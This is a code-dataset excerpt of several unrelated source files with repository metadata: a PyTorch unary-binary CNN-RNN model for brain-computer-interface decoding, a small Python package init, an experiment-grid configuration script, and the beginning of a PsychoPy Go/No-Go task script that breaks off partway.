] | null | null | null | app/uBrain/model/model_hub.py | pan185/UnarySim | c03386efdbb8151f3c33f34b44d1d6a6fc960434 | [
"MIT"
] | null | null | null | import math
import warnings
import numbers
from typing import List, Tuple, Optional, overload, Union
import torch
import torch.nn as nn
import torch.nn.functional as F
from UnarySim.kernel.conv import HUBConv2d
from UnarySim.kernel.linear import HUBLinear
from UnarySim.kernel.sigmoid import ScaleHardsigmoid
from UnarySim.kernel.relu import ScaleReLU
from UnarySim.kernel.rnn import HUBMGUCell, HardMGUCell
from UnarySim.metric.metric import SourceGen, RNG, BSGen, ProgError
from UnarySim.kernel.utils import progerror_report
class Cascade_CNN_RNN(torch.nn.Module):
    """
    This is the hybrid unary binary version of the cascade CNN RNN for BCI, i.e., uBrain
    """
    def __init__(self,
                 input_sz=[10, 11],
                 linear_act="scalerelu",
                 cnn_chn=16,
                 cnn_kn_sz=3,
                 cnn_padding=1,  # default: perform same conv
                 fc_sz=256,
                 rnn="mgu",
                 rnn_win_sz=10,
                 rnn_hidden_sz=64,
                 rnn_hard=True,
                 bias=False,
                 init_std=None,
                 keep_prob=0.5,
                 num_class=[5, 2],
                 bitwidth_tc=8,
                 bitwidth_rc=8,
                 rng="Sobol",
                 conv1_weight=None,
                 conv1_bias=None,
                 conv2_weight=None,
                 conv2_bias=None,
                 fc3_weight=None,
                 fc3_bias=None,
                 rnn4_weight_f=None,
                 rnn4_bias_f=None,
                 rnn4_weight_n=None,
                 rnn4_bias_n=None,
                 fc5_weight=None,
                 fc5_bias=None,
                 depth=10,
                 depth_ismul=5):
        super(Cascade_CNN_RNN, self).__init__()
        self.input_sz = input_sz
        self.cnn_chn = cnn_chn
        self.cnn_kn_sz = cnn_kn_sz
        self.cnn_padding = cnn_padding
        self.fc_sz = fc_sz
        self.rnn_win_sz = rnn_win_sz
        self.rnn_hidden_sz = rnn_hidden_sz
        self.bias = bias
        self.num_class = num_class
        self.bitwidth_tc = bitwidth_tc
        self.bitwidth_rc = bitwidth_rc
        self.rng = rng
        self.conv1_weight = conv1_weight
        self.conv1_bias = conv1_bias
        self.conv2_weight = conv2_weight
        self.conv2_bias = conv2_bias
        self.fc3_weight = fc3_weight
        self.fc3_bias = fc3_bias
        self.rnn4_weight_f = rnn4_weight_f
        self.rnn4_bias_f = rnn4_bias_f
        self.rnn4_weight_n = rnn4_weight_n
        self.rnn4_bias_n = rnn4_bias_n
        self.fc5_weight = fc5_weight
        self.fc5_bias = fc5_bias
        self.cycle_tc = 2**(bitwidth_tc-1)
        self.mode = "bipolar"

        # CNN
        self.conv1 = HUBConv2d(1, cnn_chn, (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
                               binary_weight=self.conv1_weight, binary_bias=self.conv1_bias, rng=self.rng, cycle=self.cycle_tc)
        self.conv2 = HUBConv2d(cnn_chn, cnn_chn*2, (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
                               binary_weight=self.conv2_weight, binary_bias=self.conv2_bias, rng=self.rng, cycle=self.cycle_tc)
        self.fc3 = HUBLinear((input_sz[0]+2*2*(cnn_padding-1))*(input_sz[1]+2*2*(cnn_padding-1))*cnn_chn*2, fc_sz, bias=bias,
                             binary_weight=self.fc3_weight, binary_bias=self.fc3_bias, rng=self.rng, cycle=self.cycle_tc)
        self.fc3_drop = nn.Dropout(p=1-keep_prob)

        # RNN
        if rnn.lower() == "mgu":
            self.rnncell4 = HUBMGUCell(fc_sz, rnn_hidden_sz, bias=bias,
                                       binary_weight_f=self.rnn4_weight_f, binary_bias_f=self.rnn4_bias_f,
                                       binary_weight_n=self.rnn4_weight_n, binary_bias_n=self.rnn4_bias_n,
                                       rng=rng, bitwidth=bitwidth_rc, mode=self.mode, depth=depth, depth_ismul=depth_ismul)
        else:
            print("rnn type needs to be 'mgu'.")

        # MLP
        self.fc5 = HUBLinear(rnn_hidden_sz, sum(num_class), bias=bias,
                             binary_weight=self.fc5_weight, binary_bias=self.fc5_bias, rng=self.rng, cycle=self.cycle_tc)

        self.linear_act = linear_act.lower()
        if self.linear_act == "scalehardsigmoid":
            self.conv1_act = ScaleHardsigmoid()
            self.conv2_act = ScaleHardsigmoid()
            self.fc3_act = ScaleHardsigmoid()
        elif self.linear_act == "scalerelu":
            self.conv1_act = ScaleReLU()
            self.conv2_act = ScaleReLU()
            self.fc3_act = ScaleReLU()
        elif self.linear_act == "sigmoid":
            self.conv1_act = nn.Sigmoid()
            self.conv2_act = nn.Sigmoid()
            self.fc3_act = nn.Sigmoid()
        elif self.linear_act == "hardtanh":
            self.conv1_act = nn.Hardtanh()
            self.conv2_act = nn.Hardtanh()
            self.fc3_act = nn.Hardtanh()
        elif self.linear_act == "tanh":
            self.conv1_act = nn.Tanh()
            self.conv2_act = nn.Tanh()
            self.fc3_act = nn.Tanh()
        elif self.linear_act == "relu":
            self.conv1_act = nn.ReLU()
            self.conv2_act = nn.ReLU()
            self.fc3_act = nn.ReLU()
        elif self.linear_act == "relu6":
            self.conv1_act = nn.ReLU6()
            self.conv2_act = nn.ReLU6()
            self.fc3_act = nn.ReLU6()
        elif self.linear_act == "elu":
            self.conv1_act = nn.ELU()
            self.conv2_act = nn.ELU()
            self.fc3_act = nn.ELU()

    def forward(self, input, binary_fm_dict=None):
        # input is (batch, win, h, w)
        # CNN
        self.conv1_i = input.view(-1, 1, self.input_sz[0], self.input_sz[1])
        self.conv1_o = self.conv1(self.conv1_i)
        self.conv1_act_o = self.conv1_act(self.conv1_o)
        self.conv2_o = self.conv2(self.conv1_act_o)
        self.conv2_act_o = self.conv2_act(self.conv2_o)
        self.fc3_i = self.conv2_act_o.view(self.conv2_act_o.shape[0], -1)
        self.fc3_o = self.fc3(self.fc3_i)
        self.fc3_act_o = self.fc3_act(self.fc3_o)
        self.fc3_drop_o = self.fc3_drop(self.fc3_act_o)
        self.fc3_view_o = self.fc3_drop_o.view(-1, self.rnn_win_sz, self.fc_sz)
        self.fc3_trans_o = self.fc3_view_o.transpose(0, 1)
        # RNN
        self.rnn_out = []
        hx = torch.zeros(self.fc3_trans_o[0].size()[0], self.rnn_hidden_sz, dtype=input.dtype, device=input.device)
        for i in range(self.rnn_win_sz):
            hx = self.rnncell4(self.fc3_trans_o[i], hx)
            self.rnn_out.append(hx)
        # MLP
        self.fc5_i = self.rnn_out[-1]
        self.fc5_o = self.fc5(self.fc5_i)
        return nn.Hardtanh()(self.fc5_o)
class Cascade_CNN_RNN_fp_rnn(torch.nn.Module):
    """
    This is the hybrid unary binary version of the cascade CNN RNN for BCI, i.e., uBrain,
    but the RNN is in fp format, so that the entire model is trainable.
    """
    def __init__(self,
                 input_sz=[10, 11],
                 linear_act="scalerelu",
                 cnn_chn=16,
                 cnn_kn_sz=3,
                 cnn_padding=1,  # default: perform same conv
                 fc_sz=256,
                 rnn="mgu",
                 rnn_win_sz=10,
                 rnn_hidden_sz=64,
                 rnn_hard=True,
                 bias=False,
                 init_std=None,
                 keep_prob=0.5,
                 num_class=[5, 2],
                 bitwidth_tc=8,
                 bitwidth_rc=8,
                 rng="Sobol",
                 conv1_weight=None,
                 conv1_bias=None,
                 conv2_weight=None,
                 conv2_bias=None,
                 fc3_weight=None,
                 fc3_bias=None,
                 rnn4_weight_f=None,
                 rnn4_bias_f=None,
                 rnn4_weight_n=None,
                 rnn4_bias_n=None,
                 fc5_weight=None,
                 fc5_bias=None,
                 depth=10,
                 depth_ismul=5):
        super(Cascade_CNN_RNN_fp_rnn, self).__init__()
        self.input_sz = input_sz
        self.cnn_chn = cnn_chn
        self.cnn_kn_sz = cnn_kn_sz
        self.cnn_padding = cnn_padding
        self.fc_sz = fc_sz
        self.rnn_win_sz = rnn_win_sz
        self.rnn_hidden_sz = rnn_hidden_sz
        self.bias = bias
        self.num_class = num_class
        self.bitwidth_tc = bitwidth_tc
        self.bitwidth_rc = bitwidth_rc
        self.rng = rng
        self.conv1_weight = conv1_weight
        self.conv1_bias = conv1_bias
        self.conv2_weight = conv2_weight
        self.conv2_bias = conv2_bias
        self.fc3_weight = fc3_weight
        self.fc3_bias = fc3_bias
        self.rnn4_weight_f = rnn4_weight_f
        self.rnn4_bias_f = rnn4_bias_f
        self.rnn4_weight_n = rnn4_weight_n
        self.rnn4_bias_n = rnn4_bias_n
        self.fc5_weight = fc5_weight
        self.fc5_bias = fc5_bias
        self.cycle_tc = 2**(bitwidth_tc-1)
        self.mode = "bipolar"

        # CNN
        self.conv1 = HUBConv2d(1, cnn_chn, (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
                               binary_weight=self.conv1_weight, binary_bias=self.conv1_bias, rng=self.rng, cycle=self.cycle_tc)
        self.conv2 = HUBConv2d(cnn_chn, cnn_chn*2, (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
                               binary_weight=self.conv2_weight, binary_bias=self.conv2_bias, rng=self.rng, cycle=self.cycle_tc)
        self.fc3 = HUBLinear((input_sz[0]+2*2*(cnn_padding-1))*(input_sz[1]+2*2*(cnn_padding-1))*cnn_chn*2, fc_sz, bias=bias,
                             binary_weight=self.fc3_weight, binary_bias=self.fc3_bias, rng=self.rng, cycle=self.cycle_tc)
        self.fc3_drop = nn.Dropout(p=1-keep_prob)

        # RNN
        if rnn.lower() == "mgu":
            self.rnncell4 = HardMGUCell(fc_sz, rnn_hidden_sz, bias=bias, hard=rnn_hard)
        else:
            print("rnn type needs to be 'mgu'.")

        # MLP
        self.fc5 = HUBLinear(rnn_hidden_sz, sum(num_class), bias=bias,
                             binary_weight=self.fc5_weight, binary_bias=self.fc5_bias, rng=self.rng, cycle=self.cycle_tc)

        self.linear_act = linear_act.lower()
        if self.linear_act == "scalehardsigmoid":
            self.conv1_act = ScaleHardsigmoid()
            self.conv2_act = ScaleHardsigmoid()
            self.fc3_act = ScaleHardsigmoid()
        elif self.linear_act == "scalerelu":
            self.conv1_act = ScaleReLU()
            self.conv2_act = ScaleReLU()
            self.fc3_act = ScaleReLU()
        elif self.linear_act == "sigmoid":
            self.conv1_act = nn.Sigmoid()
            self.conv2_act = nn.Sigmoid()
            self.fc3_act = nn.Sigmoid()
        elif self.linear_act == "hardtanh":
            self.conv1_act = nn.Hardtanh()
            self.conv2_act = nn.Hardtanh()
            self.fc3_act = nn.Hardtanh()
        elif self.linear_act == "tanh":
            self.conv1_act = nn.Tanh()
            self.conv2_act = nn.Tanh()
            self.fc3_act = nn.Tanh()
        elif self.linear_act == "relu":
            self.conv1_act = nn.ReLU()
            self.conv2_act = nn.ReLU()
            self.fc3_act = nn.ReLU()
        elif self.linear_act == "relu6":
            self.conv1_act = nn.ReLU6()
            self.conv2_act = nn.ReLU6()
            self.fc3_act = nn.ReLU6()
        elif self.linear_act == "elu":
            self.conv1_act = nn.ELU()
            self.conv2_act = nn.ELU()
            self.fc3_act = nn.ELU()

    def forward(self, input, binary_fm_dict=None):
        # input is (batch, win, h, w)
        # CNN
        self.conv1_i = input.view(-1, 1, self.input_sz[0], self.input_sz[1])
        self.conv1_o = self.conv1(self.conv1_i)
        self.conv1_act_o = self.conv1_act(self.conv1_o)
        self.conv2_o = self.conv2(self.conv1_act_o)
        self.conv2_act_o = self.conv2_act(self.conv2_o)
        self.fc3_i = self.conv2_act_o.view(self.conv2_act_o.shape[0], -1)
        self.fc3_o = self.fc3(self.fc3_i)
        self.fc3_act_o = self.fc3_act(self.fc3_o)
        self.fc3_drop_o = self.fc3_drop(self.fc3_act_o)
        self.fc3_view_o = self.fc3_drop_o.view(-1, self.rnn_win_sz, self.fc_sz)
        self.fc3_trans_o = self.fc3_view_o.transpose(0, 1)
        # RNN
        self.rnn_out = []
        hx = torch.zeros(self.fc3_trans_o[0].size()[0], self.rnn_hidden_sz, dtype=input.dtype, device=input.device)
        for i in range(self.rnn_win_sz):
            hx = self.rnncell4(self.fc3_trans_o[i], hx)
            self.rnn_out.append(hx)
        # MLP
        self.fc5_i = self.rnn_out[-1]
        self.fc5_o = self.fc5(self.fc5_i)
        return nn.Hardtanh()(self.fc5_o)
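The `in_features` expression of `fc3` above encodes how two stacked convolutions change the spatial size: with kernel size `k` and padding `p`, each conv adds `2*p - (k-1)` to each spatial dimension (zero for the default `k=3, p=1` "same" convolution), and `conv2` doubles the channel count. A pure-Python sketch of that bookkeeping, with no torch dependency — the helper name is mine:

```python
def fc3_in_features(input_sz, cnn_chn, cnn_kn_sz=3, cnn_padding=1, n_conv=2):
    """Flattened feature count after n_conv stacked convolutions.

    Each conv changes a spatial dim by 2*padding - (kernel - 1); the second
    conv doubles the channels, mirroring HUBConv2d(cnn_chn, cnn_chn*2, ...).
    """
    delta = n_conv * (2 * cnn_padding - (cnn_kn_sz - 1))
    h = input_sz[0] + delta
    w = input_sz[1] + delta
    return h * w * (cnn_chn * 2)

fc3_in_features([10, 11], 16)  # 10 * 11 * 32 = 3520
```

With the model's defaults (`input_sz=[10, 11]`, `cnn_chn=16`, `cnn_padding=1`) this reproduces the `(10)*(11)*32 = 3520` inputs that `fc3` expects.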
| 42.277603 | 168 | 0.550366 | 1,770 | 13,402 | 3.875141 | 0.087006 | 0.061233 | 0.041989 | 0.034699 | 0.899256 | 0.893425 | 0.893425 | 0.886718 | 0.886718 | 0.886718 | 0 | 0.038992 | 0.351291 | 13,402 | 316 | 169 | 42.411392 | 0.749942 | 0.0291 | 0 | 0.925373 | 0 | 0 | 0.016974 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.052239 | 0 | 0.08209 | 0.007463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f5b844593d16ec6af3c38a06c0e651e64153ec9e | 258 | py | Python | dnd5gen/char_backgrounds/__init__.py | r3valkyrie/dnd5gen | e88b055aaf24b25f689cb07013f02a73a0d976d7 | [
"MIT"
] | null | null | null | dnd5gen/char_backgrounds/__init__.py | r3valkyrie/dnd5gen | e88b055aaf24b25f689cb07013f02a73a0d976d7 | [
"MIT"
] | 1 | 2020-01-16T21:15:46.000Z | 2020-01-16T21:15:46.000Z | dnd5gen/char_backgrounds/__init__.py | r3valkyrie/dnd5gen | e88b055aaf24b25f689cb07013f02a73a0d976d7 | [
"MIT"
] | null | null | null | from dnd5gen.char_backgrounds.acolyte import Acolyte
from dnd5gen.char_backgrounds.folk_hero import FolkHero
from dnd5gen.char_backgrounds.noble import Noble
from dnd5gen.char_backgrounds.sage import Sage
from dnd5gen.char_backgrounds.soldier import Soldier
| 43 | 55 | 0.883721 | 36 | 258 | 6.166667 | 0.333333 | 0.247748 | 0.337838 | 0.585586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021008 | 0.077519 | 258 | 5 | 56 | 51.6 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb18fe689d67a11c7164ae60030bb3a78ad8eaa3 | 5,976 | py | Python | plotting/regenerate_run_scripts (optional).py | GustikS/NeuraLifting | c7e59175f50200897a362dff09b7fe2e7b89e7b6 | [
"MIT"
] | 1 | 2020-07-21T04:35:52.000Z | 2020-07-21T04:35:52.000Z | plotting/regenerate_run_scripts (optional).py | GustikS/NeuraLifting | c7e59175f50200897a362dff09b7fe2e7b89e7b6 | [
"MIT"
] | null | null | null | plotting/regenerate_run_scripts (optional).py | GustikS/NeuraLifting | c7e59175f50200897a362dff09b7fe2e7b89e7b6 | [
"MIT"
] | null | null | null | from grid import *
#%%
grid = GridSetup(experiment_id="digits_lrnn",
param_ranges={"iso": [1, 2, 3, 4], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/LRNN_template_embeddings"],
walltime="10:00:00",
memory_max="20g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_gnn",
param_ranges={"iso": [1, 2, 3, 4], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/GNN_template_embeddings"],
walltime="10:00:00",
memory_max="20g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_kinships",
param_ranges={"iso": [1, 2, 3, 4], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "ts": [10]},
datasets=["kbs/kinships"],
templates=["template_embeddings"],
walltime="10:00:00",
memory_max="20g",
rci=True,
template_per_dataset=True,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="lossless_kbc",
param_ranges={"iso": [-1, 14], "prune": [-1, 1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets="kbs",
templates=["template_embeddings"],
walltime="23:59:00",
memory_max="30g",
rci=True,
template_per_dataset=True,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="lossless_lrnn",
param_ranges={"iso": [-1, 14], "prune": [-1, 1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets="molecules",
templates=["molecules/LRNN_template_embeddings"],
walltime="23:59:00",
memory_max="30g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="lossless_gnn",
param_ranges={"iso": [-1, 14], "prune": [-1, 1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets="molecules",
templates=["molecules/GNN_template_embeddings"],
walltime="23:59:00",
memory_max="30g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_lrnn_scalar",
param_ranges={"iso": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "opt": ["adam"], "lr": [0.01], "ts": [1000]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/scalar_template_embeddings"],
walltime="23:59:00",
memory_max="40g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
#%%
grid = GridSetup(experiment_id="lrnn_scalar",
param_ranges={"iso": [-1], "prune": [-1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/scalar_template_embeddings"],
walltime="23:59:00",
memory_max="80g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_lrnn_scalar_inits",
param_ranges={"iso": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14], "prune": [1], "xval": [5],
"isocheck": [1], "isoinits": [1, 2, 3], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/scalar_template_embeddings"],
walltime="20:00:00",
memory_max="40g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
#%%
grid = GridSetup(experiment_id="digits_lrnn_vector",
param_ranges={"iso": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], "prune": [1], "xval": [5],
"isocheck": [1], "isoinits": [1, 2, 3], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/LRNN_template_embeddings"],
walltime="20:00:00",
memory_max="20g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
| 36.888889 | 113 | 0.499331 | 591 | 5,976 | 4.846024 | 0.125212 | 0.151885 | 0.080307 | 0.087291 | 0.972067 | 0.968575 | 0.939944 | 0.939944 | 0.937849 | 0.937849 | 0 | 0.064262 | 0.341198 | 5,976 | 161 | 114 | 37.118012 | 0.663195 | 0.004518 | 0 | 0.859504 | 0 | 0 | 0.182186 | 0.07577 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008264 | 0 | 0.008264 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
de1933a8be911c333678d0764ad3ecb315e7398a | 71,037 | py | Python | 3_Go_Nogo/Go_Nogo_Formal_lastrun.py | Brinks0211/cognitive_paradigms_patients | 30e3f8268e5c2b5ebfffcc4ebbcb46d8e60d039e | [
"MIT"
] | 2 | 2020-07-01T12:53:40.000Z | 2020-07-01T13:30:23.000Z | 3_Go_Nogo/Go_Nogo_Formal_lastrun.py | Brinks0211/cognitive_paradigms_patients | 30e3f8268e5c2b5ebfffcc4ebbcb46d8e60d039e | [
"MIT"
] | null | null | null | 3_Go_Nogo/Go_Nogo_Formal_lastrun.py | Brinks0211/cognitive_paradigms_patients | 30e3f8268e5c2b5ebfffcc4ebbcb46d8e60d039e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy3 Experiment Builder (v2020.1.3),
    on June 15, 2020, at 21:14
If you publish work using this script the most relevant publication is:
Peirce J, Gray JR, Simpson S, MacAskill M, Höchenberger R, Sogo H, Kastman E, Lindeløv JK. (2019)
PsychoPy2: Experiments in behavior made easy Behav Res 51: 195.
https://doi.org/10.3758/s13428-018-01193-y
"""
from __future__ import absolute_import, division
from psychopy import locale_setup
from psychopy import prefs
from psychopy import sound, gui, visual, core, data, event, logging, clock
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
from psychopy.hardware import keyboard
# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__))
os.chdir(_thisDir)
# Store info about the experiment session
psychopyVersion = '2020.1.3'
expName = 'Go_Nogo_Formal' # from the Builder filename that created this script
# dialog fields: participant ID, name in pinyin (姓名拼音), sex (男1/女2 = male 1 / female 2),
# admission/discharge status (入院1/出院2 = admission 1 / discharge 2)
expInfo = {'participant': '', '姓名拼音': '', '男1/女2': '', '入院1/出院2': ''}
dlg = gui.DlgFromDict(dictionary=expInfo, sortKeys=False, title=expName)
if dlg.OK == False:
    core.quit()  # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
expInfo['psychopyVersion'] = psychopyVersion
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
    extraInfo=expInfo, runtimeInfo=None,
    originPath='C:\\Users\\zhang\\Desktop\\张以昊\\课题组\\3_Go_Nogo\\Go_Nogo_Formal_lastrun.py',
    savePickle=True, saveWideText=True,
    dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
frameTolerance = 0.001 # how close to onset before 'same' frame
# Start Code - component code to be run before the window creation
# Setup the Window
win = visual.Window(
    size=[1536, 864], fullscr=True, screen=0,
    winType='pyglet', allowGUI=False, allowStencil=False,
    monitor='testMonitor', color=[0,0,0], colorSpace='rgb',
    blendMode='avg', useFBO=True,
    units='height')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
    frameDur = 1.0 / round(expInfo['frameRate'])
else:
    frameDur = 1.0 / 60.0  # could not measure, so guess
# create a default keyboard (e.g. to check for escape)
defaultKeyboard = keyboard.Keyboard()
# Initialize components for Routine "introduction1"
introduction1Clock = core.Clock()
# text: "Welcome to the test (formal part). This test has two types. (Press space to continue)"
introduction_1 = visual.TextStim(win=win, name='introduction_1',
    text='欢迎参加测试\n(正式部分)\n\n本测试分两种类型\n\n(继续,请按空格键)',
    font='Arial',
    pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
key_resp = keyboard.Keyboard()
# Initialize components for Routine "introduction4"
introduction4Clock = core.Clock()
# text: "If you are ready, please begin the formal test. (Press space to continue)"
introduction_4 = visual.TextStim(win=win, name='introduction_4',
    text='如果准备好了,请开始正式测试\n\n(继续,请按空格键)',
    font='Arial',
    pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
key_resp_4 = keyboard.Keyboard()
# Initialize components for Routine "introduction2"
introduction2Clock = core.Clock()
# text: "Type 1: a fixation '+' appears, then traffic-light pictures. Press space for a
# green or yellow light; do not press for a red light. (Press space to continue)"
introduction_2 = visual.TextStim(win=win, name='introduction_2',
    text='第一种类型\n\n测试开始时,屏幕中间会出现注视点“+”\n之后会出现不同类型的红绿灯图片\n\n如果为绿灯或者黄灯,请按下空格键\n如果为红灯,请不要按键\n\n(继续,请按空格键)',
    font='Arial',
    pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
key_resp_2 = keyboard.Keyboard()
# Initialize components for Routine "light"
lightClock = core.Clock()
concentration = visual.TextStim(win=win, name='concentration',
    text='+',
    font='Arial',
    pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
image = visual.ImageStim(
    win=win,
    name='image',
    image='sin', mask=None,
    ori=0, pos=(0, 0), size=(0.5, 0.5),
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=-1.0)
key_resp_light = keyboard.Keyboard()
# Initialize components for Routine "introduction3"
introduction3Clock = core.Clock()
# text: "Type 2: a fixation '+' appears, then a facial-expression picture. Press space for
# a happy or neutral face; do not press for a sad face. (Press space to continue)"
introduction_3 = visual.TextStim(win=win, name='introduction_3',
    text='第二种类型\n\n测试开始时,屏幕中间会出现注视点“+”\n之后会出现一个表情图片\n\n在每个表情图片出现时\n如果为快乐或者中性,请按下空格键\n如果为悲伤,请不要按键\n\n(继续,请按空格键)',
    font='Arial',
    pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
key_resp_3 = keyboard.Keyboard()
# Initialize components for Routine "face"
faceClock = core.Clock()
concentration2 = visual.TextStim(win=win, name='concentration2',
    text='+',
    font='Arial',
    pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
image_2 = visual.ImageStim(
    win=win,
    name='image_2',
    image='sin', mask=None,
    ori=0, pos=(0, 0), size=(0.4, 0.5),
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=-1.0)
key_resp_face = keyboard.Keyboard()
# Initialize components for Routine "tip1"
tip1Clock = core.Clock()
# text: "Now, test type 1. Press space for a green or yellow light; do not press for a
# red light. (Press space to continue)"
tip_1 = visual.TextStim(win=win, name='tip_1',
    text='现在,测试第一种类型\n\n如果为绿灯或者黄灯,请按下空格键\n如果为红灯,请不要按键\n\n(继续,请按空格键)\n',
    font='Arial',
    pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
key_resp_5 = keyboard.Keyboard()
# Initialize components for Routine "light"
lightClock = core.Clock()
concentration = visual.TextStim(win=win, name='concentration',
    text='+',
    font='Arial',
    pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
    color='white', colorSpace='rgb', opacity=1,
    languageStyle='LTR',
    depth=0.0);
image = visual.ImageStim(
    win=win,
    name='image',
    image='sin', mask=None,
    ori=0, pos=(0, 0), size=(0.5, 0.5),
    color=[1,1,1], colorSpace='rgb', opacity=1,
    flipHoriz=False, flipVert=False,
    texRes=128, interpolate=True, depth=-1.0)
key_resp_light = keyboard.Keyboard()
# Initialize components for Routine "tip2"
tip2Clock = core.Clock()
# text: "Now, test type 2. Press space for a happy or neutral face; do not press for a
# sad face. (Press space to continue)"
tip_2 = visual.TextStim(win=win, name='tip_2',
